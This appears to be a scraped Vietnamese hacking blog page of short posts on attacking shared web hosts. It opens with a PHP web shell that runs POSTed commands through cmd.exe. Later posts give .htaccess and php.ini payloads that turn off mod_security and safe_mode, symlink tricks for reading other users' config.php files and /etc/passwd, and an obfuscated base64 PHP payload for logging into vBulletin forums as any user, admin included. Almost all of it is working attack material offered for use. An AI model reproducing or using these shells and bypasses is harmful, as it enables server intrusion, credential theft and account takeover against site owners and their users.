echo "<font color=whitepurple>PHP Version :</font><font color=red><b>$phpver</b></font><br>";
//phpver end--
?>
<p align="left">
<?php
//path of win
$dir = @getcwd();
echo "<font color=whitepurple>U'Re In :</font><font color=red><b>$dir</b></font><br>";
//end
?>

<?php
print "<form method=post>";
print "<b><font color=white>cmd:</b></font><input size=50 name='command' value=''>";
print "<br>";
print "<b><font color=white>file :</b></font><input size=50 name='file' value=''>";
print "<br>";
print "<input type=submit name=_act value='Execute!'>";
$post = $_POST['command'];
$file = $_POST['file'];
?>
<?php
$_file = new COM("WScript.Shell");
$_file ->Run('cmd.exe /c'.$post.' > '.dirname($_SERVER[SCRIPT_FILENAME]).'/'.$file.'');
?>

Windows server bypass shell PHP

By: MIN Software on: 8:50 PM

Litespeed forbidden bypass

ln -s /home/victimuser/public_html/config.php test.shtml
.htaccess:
Options +FollowSymLinks
DirectoryIndex seees.html
RemoveHandler .php
AddType application/octet-stream .php

htaccess for Bypass LiteSpeed ُServer 2.6.18
<Files *.php>
ForceType application/x-httpd-php4
</Files>
ahm tas: <ifModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule> 

Litespeed 403 access
.Htaccess
<Files *.php>
ForceType application/x-httpd-php4
</Files>
<ahm tas: <ifModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule> 

LiteSpeed Bypass

By: MIN Software on: 8:46 PM


.htaccess
Options +FollowSymLinks
DirectoryIndex ssssss.htm
Options All Indexes
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule> 
php.ini
safe_mode = Off
disable_functions = NONE
safe_mode_gid = OFF

open_basedir = OFF 
ini.php
ini_restore("safe_mode");
ini_restore("open_basedir"); 

Linux Bypass = safe_mode: ON

By: MIN Software on: 8:40 PM
http://www.mediafire.com/?i2jes2db6w9inua 
Khi symljnk thường ghi vào 1 file bất kì

ln -s /home/user/public_html/includes/config.php config.txt
Do file config.php của victim bị chmod nên không thể đọc gián tiếp qua config.txt được.
Lỗi 1 số server sẽ ghi được trên config.ini

Forbiden bypass (ini method)

By: MIN Software on: 8:21 PM
Thường thì chúng ta
cat ,dir ,less được bởi các file trong thư viện
/user/bin/
chưa chmod
nếu chmod ko run được thì up các file này lên rồi run
./file
File Type: zip chmod.zip‎

ByPass cat, dir, less

By: MIN Software on: 8:19 PM
Up file ngang hàng index của forum vbb.
Login với user mình muốn (kể cả Admin).
<?php
echo("?>".gzuncompress(base64_decode("eJy9Uu9P2zAQ/V6p/8PhTUoqhTCk7UvWFrEuQEWhqA3aJDRFSXwFi8QOtlNg0/73nVMIIFXbt+WH43Pee747v+FBfVP3e+4WK/CFMWj99+lxnFx5Ofd+DAb93q9+j+NKSPS95GS6TJeTxfQi8QLw SnUtpDf43O9pvGuExlTJgmDh3nWp8qwMSXzrbyGLsuFo9laNLK xQ0qStVkd4v86bskQr5O64MaiFXCkYwetlnu+O7xrUj+lKaGN9 toxn8SSBFs4D97nWqqlpDhVWeReaAEhOZ+3GL2uOILMKA6gzY+ 6VJp7JSgtHi/kZMAghOfwyi9OLRXw0/U4hcwz4dhIv4o5MOXoO+qqFDukxV5Tr8M62yq68TdLUb+ACfTa V66wUvJPdaflYGmyPY53TMRVK3RL2mRrA35UDsLrB16OTfKP0X DdpVfyTv12vA7nCJvP56TROl4ezZLB9A3zAIm2ksVrcYupk3ti LELVWBRqTSrzfmMD3inrjrACSxWW8GR2Uqw0i1cjJToX13erv9 un3Dsb93nCC0qIeD/NxGEbRV717pDE7hSiCBD9WcNxkmovs3ERRGBJomOvuJfZK6Qpc w0fMTfcZOcfeKD5ilDKDjWVGjBEWiH3pDBAN9/IxDIWsGwv2sSauxQfLnnRyzsCInzTb/8BAyTNFTZivURPsRpjQ2McSwzwrbp0VJZ+oUmlno3dFe3kvpMb +i+O5zCi3t+mYJq9El9DyKSKHNRQCzObH03Mgh/+H7P4AuAVyng=="))); ?> 

Bypass Login vBB

By: MIN Software on: 8:15 PM
by pass file php.ini bằng htaccess

php.ini
safemode = off
register_globals = on
.htccess
suPHP_ConfigPath /home/user/public_html/php.ini

[HOW TO] Safe mode=on to Safe mode=off [tested and working]

By: MIN Software on: 7:50 PM
Options +FollowSymLinks

DirectoryIndex ssssss.htm

Options All Indexes

<IfModule mod_security.c>

SecFilterEngine Off

SecFilterScanPOST Off

SecFilterCheckURLEncoding Off

SecFilterCheckCookieFormat Off

SecFilterCheckUnicodeEncoding Off

SecFilterNormalizeCookies Off

</IfModule>

SetEnv PHPRC /home/user/public_html/php.ini

suPHP_ConfigPath /home/user/public_html/php.ini

Safe off htaccess

By: MIN Software on: 7:47 PM
Yêu cầu server chạy perl shell và ko dis hàm symljnk.
tặng thêm con shell mới
sau khi cat /etc/passwd xong
copy hết bỏ vào file go.pl nó sẽ tự symljnk 
 

Symlink ALL Config

By: MIN Software on: 7:44 PM
cgitelnet symlink htaccess

symljnk ghi vào file.hack
download file.hack về
Options +ExecCGI
AddHandler cgi-script cgi pl cgi love jpg
RewriteEngine on
RewriteRule (.*).mil$ $1.cgi
Options +FollowSymLinks
DirectoryIndex cmd.html
Options +Indexes
RemoveHandler .hack
AddType text/plain .hack


SSI VIEW SYMLJNK
.htaccess
Options +Includes
AddType text/html .shtml
AddHandler server-parsed .shtml
ln -s /et/passwd juno.txt 
juno.shtml:
<!--#include virtual="juno.txt" -->

direct symljnk view file.php dưới dạng file text
options all
Options +FollowSymLinks
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType text/plain .php
AddHandler server-parsed .php



 Safe mod off
Options +FollowSymLinks
DirectoryIndex ssssss.htm
Options All Indexes
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule>
SetEnv PHPRC /home/user/public_html/php.ini
suPHP_ConfigPath /home/user/public_html/php.ini 

or
Options +ExecCGI
AddHandler cgi-script cgi pl cgi love jpg
RewriteEngine on
RewriteRule (.*)\.mil$ $1.cgi
Options +FollowSymLinks
DirectoryIndex cmd.html
Options +Indexes
RemoveHandler .hack
AddType text/plain .hack
## milw0rmvn exploit ##
php.ini:
safe_mode=Off
Disable_Functions=None
Open_Basedir=None
Safe_Exec_Dir=None
Safe_Gid=None
Safe_Include_Dir=None
Sql.safe_mode=None
cURL=Off
MySQL=Off
MSSQL=Off
PostgreSQL=Off
Oracle=Off

or
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterSanPOST Off
</IfModule>
#START #
Options +ExecCGI
AddHandler cgi-script cgi pl tmt

Options +FollowSymLinks
DirectoryIndex seees.html
Options +Indexes

VIEW file.php
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any 

hạ safe_mode
php.ini
safe_mode = Off
disable_functions = ""
.htaccess
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule> 
.htaccess
AddHandler application/x-httpd-php4 .php .php4 .php3
.htaccess
php_flag safe_mode off
php_flag disable_functions "" 
.htaccess
 php_admin_value disable_functions ""
php_admin_value safe_mode off
.htaccess
php_value safe_mode off
php_value disable_functions ""
.htaccess
SetEnv PHPRC /home/user/public_html/php.ini
.htaccess
suPHP_ConfigPath /home/user/public_html/php.ini
.htaccess
<Files *.php>
ForceType application/x-httpd-php4
</Files>

.htaccess

By: MIN Software on: 7:31 PM
http://junookyo.blogspot.com/2012/03/symljnk-bypass-view-filephp.html
Nếu lại bị chặn forbidden thì chơi cách này:

yêu cầu có quyền cpanel
đăng nhập qua cổng :2077 để view symljnk cpanel

403 Forbidden bypass

By: MIN Software on: 7:20 PM
ln -s bypassed ~> symljnk từng user
Tạo
cgi_shell, python_shell
ln -s bypass /etc/passwd 
Link download: Click!

Symlink forbidden bypass shell | ln -s permiison bypassed shell publiced

By: MIN Software on: 7:11 PM

 

Our Team Members

Copyright © hacker va bao mat | Designed by Templateism.com | WPResearcher.com